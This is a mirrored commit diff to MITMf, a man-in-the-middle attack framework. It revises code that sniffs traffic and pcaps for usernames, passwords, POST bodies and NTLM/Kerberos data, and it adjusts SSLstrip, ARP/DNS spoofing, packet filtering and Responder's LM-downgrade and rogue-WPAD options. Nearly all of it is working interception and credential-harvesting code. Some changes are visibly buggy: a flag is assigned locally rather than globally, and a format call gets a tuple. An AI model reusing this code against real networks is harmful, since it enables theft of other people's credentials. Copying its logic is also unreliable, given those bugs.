mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
Fixed bug where Net-Creds wouldn't parse URL's and HTTP data when reading from pcap
Active packet filtering engine and proxy + servers are now mutually exclusive , you can only start one of them (iptable conflicts)
This commit is contained in:
parent
28fc081068
commit
986b2b851f
9 changed files with 179 additions and 160 deletions
|
@ -21,7 +21,7 @@ import pyinotify
|
|||
import threading
|
||||
from configobj import ConfigObj
|
||||
|
||||
class ConfigWatcher(pyinotify.ProcessEvent):
|
||||
class ConfigWatcher(pyinotify.ProcessEvent, object):
|
||||
|
||||
@property
|
||||
def config(self):
|
||||
|
|
178
core/netcreds.py
178
core/netcreds.py
|
@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
|
|||
# Prone to false+ but prefer that to false-
|
||||
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
|
||||
|
||||
parsing_pcap = False
|
||||
|
||||
class NetCreds:
|
||||
|
||||
version = "1.0"
|
||||
|
@ -51,16 +53,65 @@ class NetCreds:
|
|||
except Exception as e:
|
||||
if "Interrupted system call" in e: pass
|
||||
|
||||
def start(self, interface, ip, pcap):
|
||||
if pcap:
|
||||
for pkt in PcapReader(pcap):
|
||||
pkt_parser(pkt)
|
||||
sys.exit()
|
||||
else:
|
||||
def start(self, interface, ip):
|
||||
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def parse_pcap(self, pcap):
|
||||
parsing_pcap=True
|
||||
|
||||
for pkt in PcapReader(pcap):
|
||||
pkt_parser(pkt)
|
||||
|
||||
sys.exit()
|
||||
|
||||
def frag_remover(ack, load):
|
||||
'''
|
||||
Keep the FILO OrderedDict of frag loads from getting too large
|
||||
3 points of limit:
|
||||
Number of ip_ports < 50
|
||||
Number of acks per ip:port < 25
|
||||
Number of chars in load < 5000
|
||||
'''
|
||||
global pkt_frag_loads
|
||||
|
||||
# Keep the number of IP:port mappings below 50
|
||||
# last=False pops the oldest item rather than the latest
|
||||
while len(pkt_frag_loads) > 50:
|
||||
pkt_frag_loads.popitem(last=False)
|
||||
|
||||
# Loop through a deep copy dict but modify the original dict
|
||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||
# Keep 25 ack:load's per ip:port
|
||||
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||
pkt_frag_loads[ip_port].popitem(last=False)
|
||||
|
||||
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
# Keep the load less than 75,000 chars
|
||||
for ack in copy_pkt_frag_loads[ip_port]:
|
||||
# If load > 5000 chars, just keep the last 200 chars
|
||||
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
|
||||
|
||||
def frag_joiner(ack, src_ip_port, load):
|
||||
'''
|
||||
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||
'''
|
||||
for ip_port in pkt_frag_loads:
|
||||
if src_ip_port == ip_port:
|
||||
if ack in pkt_frag_loads[src_ip_port]:
|
||||
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||
old_load = pkt_frag_loads[src_ip_port][ack]
|
||||
concat_load = old_load + load
|
||||
return OrderedDict([(ack, concat_load)])
|
||||
|
||||
return OrderedDict([(ack, load)])
|
||||
|
||||
def pkt_parser(pkt):
|
||||
'''
|
||||
Start parsing packets here
|
||||
|
@ -127,53 +178,7 @@ def pkt_parser(pkt):
|
|||
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
|
||||
|
||||
# HTTP and other protocols that run on TCP + a raw load
|
||||
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
|
||||
|
||||
def frag_remover(ack, load):
|
||||
'''
|
||||
Keep the FILO OrderedDict of frag loads from getting too large
|
||||
3 points of limit:
|
||||
Number of ip_ports < 50
|
||||
Number of acks per ip:port < 25
|
||||
Number of chars in load < 5000
|
||||
'''
|
||||
global pkt_frag_loads
|
||||
|
||||
# Keep the number of IP:port mappings below 50
|
||||
# last=False pops the oldest item rather than the latest
|
||||
while len(pkt_frag_loads) > 50:
|
||||
pkt_frag_loads.popitem(last=False)
|
||||
|
||||
# Loop through a deep copy dict but modify the original dict
|
||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
if len(copy_pkt_frag_loads[ip_port]) > 0:
|
||||
# Keep 25 ack:load's per ip:port
|
||||
while len(copy_pkt_frag_loads[ip_port]) > 25:
|
||||
pkt_frag_loads[ip_port].popitem(last=False)
|
||||
|
||||
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
|
||||
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
|
||||
for ip_port in copy_pkt_frag_loads:
|
||||
# Keep the load less than 75,000 chars
|
||||
for ack in copy_pkt_frag_loads[ip_port]:
|
||||
# If load > 5000 chars, just keep the last 200 chars
|
||||
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
|
||||
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
|
||||
|
||||
def frag_joiner(ack, src_ip_port, load):
|
||||
'''
|
||||
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
|
||||
'''
|
||||
for ip_port in pkt_frag_loads:
|
||||
if src_ip_port == ip_port:
|
||||
if ack in pkt_frag_loads[src_ip_port]:
|
||||
# Make pkt_frag_loads[src_ip_port][ack] = full load
|
||||
old_load = pkt_frag_loads[src_ip_port][ack]
|
||||
concat_load = old_load + load
|
||||
return OrderedDict([(ack, concat_load)])
|
||||
|
||||
return OrderedDict([(ack, load)])
|
||||
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
|
||||
|
||||
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
|
||||
'''
|
||||
|
@ -530,7 +535,7 @@ def irc_logins(full_load, pkt):
|
|||
msg = 'IRC pass: %s' % pass_search2.group(1)
|
||||
return msg
|
||||
|
||||
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
||||
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
|
||||
'''
|
||||
Pull out pertinent info from the parsed HTTP packet data
|
||||
'''
|
||||
|
@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
|||
else:
|
||||
host = ''
|
||||
|
||||
#if http_line != None:
|
||||
# method, path = parse_http_line(http_line, http_methods)
|
||||
# http_url_req = get_http_url(method, host, path, headers)
|
||||
#if http_url_req != None:
|
||||
#printer(src_ip_port, None, http_url_req)
|
||||
if parsing_pcap is True:
|
||||
|
||||
if http_line != None:
|
||||
method, path = parse_http_line(http_line, http_methods)
|
||||
http_url_req = get_http_url(method, host, path, headers)
|
||||
if http_url_req != None:
|
||||
if verbose == False:
|
||||
if len(http_url_req) > 98:
|
||||
http_url_req = http_url_req[:99] + '...'
|
||||
printer(src_ip_port, None, http_url_req)
|
||||
|
||||
# Print search terms
|
||||
searched = get_http_searches(http_url_req, body, host)
|
||||
if searched:
|
||||
printer(src_ip_port, dst_ip_port, searched)
|
||||
|
||||
#We dont need this cause its being taking care of by the proxy
|
||||
|
||||
# Print user/pwds
|
||||
#if body != '':
|
||||
# user_passwd = get_login_pass(body)
|
||||
# if user_passwd != None:
|
||||
# try:
|
||||
# http_user = user_passwd[0].decode('utf8')
|
||||
# http_pass = user_passwd[1].decode('utf8')
|
||||
# # Set a limit on how long they can be prevent false+
|
||||
# if len(http_user) > 75 or len(http_pass) > 75:
|
||||
# return
|
||||
# user_msg = 'HTTP username: %s' % http_user
|
||||
# printer(src_ip_port, dst_ip_port, user_msg)
|
||||
# pass_msg = 'HTTP password: %s' % http_pass
|
||||
# printer(src_ip_port, dst_ip_port, pass_msg)
|
||||
# except UnicodeDecodeError:
|
||||
# pass
|
||||
if body != '':
|
||||
user_passwd = get_login_pass(body)
|
||||
if user_passwd != None:
|
||||
try:
|
||||
http_user = user_passwd[0].decode('utf8')
|
||||
http_pass = user_passwd[1].decode('utf8')
|
||||
# Set a limit on how long they can be prevent false+
|
||||
if len(http_user) > 75 or len(http_pass) > 75:
|
||||
return
|
||||
user_msg = 'HTTP username: %s' % http_user
|
||||
printer(src_ip_port, dst_ip_port, user_msg)
|
||||
pass_msg = 'HTTP password: %s' % http_pass
|
||||
printer(src_ip_port, dst_ip_port, pass_msg)
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
|
||||
# Print POST loads
|
||||
# ocsp is a common SSL post load that's never interesting
|
||||
#if method == 'POST' and 'ocsp.' not in host:
|
||||
# try:
|
||||
# msg = 'POST load: %s' % body.encode('utf8')
|
||||
# printer(src_ip_port, None, msg)
|
||||
# except UnicodeDecodeError:
|
||||
# pass
|
||||
if method == 'POST' and 'ocsp.' not in host:
|
||||
try:
|
||||
if verbose == False and len(body) > 99:
|
||||
# If it can't decode to utf8 we're probably not interested in it
|
||||
msg = 'POST load: %s...' % body[:99].encode('utf8')
|
||||
else:
|
||||
msg = 'POST load: %s' % body.encode('utf8')
|
||||
printer(src_ip_port, None, msg)
|
||||
except UnicodeDecodeError:
|
||||
pass
|
||||
|
||||
# Kerberos over TCP
|
||||
decoded = Decode_Ip_Packet(str(pkt)[14:])
|
||||
|
@ -904,7 +916,7 @@ def get_login_pass(body):
|
|||
|
||||
def printer(src_ip_port, dst_ip_port, msg):
|
||||
if dst_ip_port != None:
|
||||
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
|
||||
print_str = '[{} > {}] {}'.format((src_ip_port, dst_ip_port, msg))
|
||||
# All credentials will have dst_ip_port, URLs will not
|
||||
|
||||
log.info("{}".format(print_str))
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
import threading
|
||||
|
||||
from core.utils import set_ip_forwarding, iptables
|
||||
from core.logger import logger
|
||||
from scapy.all import *
|
||||
|
@ -21,9 +19,7 @@ class PacketFilter:
|
|||
self.nfqueue = NetfilterQueue()
|
||||
self.nfqueue.bind(1, self.modify)
|
||||
|
||||
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
self.nfqueue.run()
|
||||
|
||||
def modify(self, pkt):
|
||||
#log.debug("Got packet")
|
||||
|
|
|
@ -108,6 +108,7 @@ class ProxyPlugins:
|
|||
log.debug("hooking {}()".format(fname))
|
||||
#calls any plugin that has this hook
|
||||
try:
|
||||
if self.plugin_mthds:
|
||||
for f in self.plugin_mthds[fname]:
|
||||
a = f(**args)
|
||||
if a != None: args = a
|
||||
|
|
75
mitmf.py
75
mitmf.py
|
@ -52,7 +52,7 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
|
|||
#add MITMf options
|
||||
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
|
||||
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
|
||||
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
|
||||
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
|
||||
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
|
||||
|
@ -73,6 +73,15 @@ options = parser.parse_args()
|
|||
#Set the log level
|
||||
logger().log_level = logging.__dict__[options.log_level.upper()]
|
||||
|
||||
from core.logger import logger
|
||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||
log = logger().setup_logger("MITMf", formatter)
|
||||
|
||||
from core.netcreds import NetCreds
|
||||
|
||||
if options.read_pcap:
|
||||
NetCreds().parse_pcap(options.read_pcap)
|
||||
|
||||
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
|
||||
from core.utils import get_ip, get_mac, shutdown
|
||||
options.ip = get_ip(options.interface)
|
||||
|
@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
|
|||
|
||||
settings.Config.populate(options)
|
||||
|
||||
from core.logger import logger
|
||||
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||
log = logger().setup_logger("MITMf", formatter)
|
||||
|
||||
log.debug("MITMf started: {}".format(sys.argv))
|
||||
|
||||
#Start Net-Creds
|
||||
from core.netcreds import NetCreds
|
||||
NetCreds().start(options.interface, options.ip, options.read_pcap)
|
||||
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
|
||||
|
||||
NetCreds().start(options.interface, options.ip)
|
||||
print "|"
|
||||
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
||||
|
||||
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||
from core.proxyplugins import ProxyPlugins
|
||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
|
||||
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
||||
URLMonitor.getInstance().setCaching(options.preserve_cache)
|
||||
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
||||
|
||||
strippingFactory = http.HTTPFactory(timeout=10)
|
||||
strippingFactory.protocol = StrippingProxy
|
||||
|
||||
reactor.listenTCP(options.listen_port, strippingFactory)
|
||||
|
||||
ProxyPlugins().all_plugins = plugins
|
||||
|
||||
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
|
||||
for plugin in plugins:
|
||||
|
||||
#load only the plugins that have been called at the command line
|
||||
|
@ -126,25 +120,43 @@ for plugin in plugins:
|
|||
for line in xrange(0, len(plugin.tree_info)):
|
||||
print "| |_ {}".format(plugin.tree_info.pop())
|
||||
|
||||
plugin.reactor(strippingFactory)
|
||||
plugin.start_config_watch()
|
||||
|
||||
print "|"
|
||||
print "|_ Sergio-Proxy v0.2.1 online"
|
||||
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
|
||||
print "|"
|
||||
|
||||
if options.filter:
|
||||
from core.packetfilter import PacketFilter
|
||||
pfilter = PacketFilter(options.filter)
|
||||
pfilter.start()
|
||||
print "|_ PacketFilter online"
|
||||
print "| |_ Applying filter {} to incoming packets".format(options.filter)
|
||||
print " |_ Applying filter {} to incoming packets".format(options.filter)
|
||||
try:
|
||||
pfilter.start()
|
||||
except KeyboardInterrupt:
|
||||
pfilter.stop()
|
||||
shutdown()
|
||||
|
||||
print "|_ Net-Creds v{} online".format(NetCreds.version)
|
||||
else:
|
||||
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
|
||||
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
||||
URLMonitor.getInstance().setCaching(options.preserve_cache)
|
||||
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
||||
|
||||
strippingFactory = http.HTTPFactory(timeout=10)
|
||||
strippingFactory.protocol = StrippingProxy
|
||||
|
||||
reactor.listenTCP(options.listen_port, strippingFactory)
|
||||
|
||||
for plugin in plugins:
|
||||
if vars(options)[plugin.optname] is True:
|
||||
plugin.reactor(strippingFactory)
|
||||
|
||||
print "|_ Sergio-Proxy v0.2.1 online"
|
||||
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
|
||||
|
||||
#Start mitmf-api
|
||||
from core.mitmfapi import mitmfapi
|
||||
print "|"
|
||||
print "|_ MITMf-API online"
|
||||
mitmfapi().start()
|
||||
|
||||
|
@ -167,7 +179,4 @@ print "|_ SMB server online\n"
|
|||
reactor.run()
|
||||
print "\n"
|
||||
|
||||
if options.filter:
|
||||
pfilter.stop()
|
||||
|
||||
shutdown()
|
|
@ -31,6 +31,7 @@ class Plugin(ConfigWatcher):
|
|||
|
||||
def __init__(self, parser):
|
||||
'''Passed the options namespace'''
|
||||
|
||||
if self.desc:
|
||||
sgroup = parser.add_argument_group(self.name, self.desc)
|
||||
else:
|
||||
|
|
|
@ -91,5 +91,5 @@ class Responder(Plugin):
|
|||
options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query")
|
||||
options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
|
||||
options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server")
|
||||
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
|
||||
options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||
options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)")
|
||||
options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
|
||||
|
|
|
@ -70,7 +70,7 @@ class Spoof(Plugin):
|
|||
|
||||
if options.dns:
|
||||
self.tree_info.append('DNS spoofing enabled')
|
||||
if iptables().dns is False:
|
||||
if iptables().dns is False and options.filter is False:
|
||||
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
||||
|
||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||
|
@ -78,7 +78,7 @@ class Spoof(Plugin):
|
|||
|
||||
set_ip_forwarding(1)
|
||||
|
||||
if iptables().http is False:
|
||||
if iptables().http is False and options.filter is False:
|
||||
iptables().HTTP(options.listen_port)
|
||||
|
||||
for protocol in self.protocol_instances:
|
||||
|
|
|
@ -33,7 +33,7 @@ class SSLstripPlus(Plugin):
|
|||
from core.servers.DNS import DNSChef
|
||||
from core.utils import iptables
|
||||
|
||||
if iptables().dns is False:
|
||||
if iptables().dns is False and options.filter is False:
|
||||
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
||||
|
||||
URLMonitor.getInstance().setHstsBypass()
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue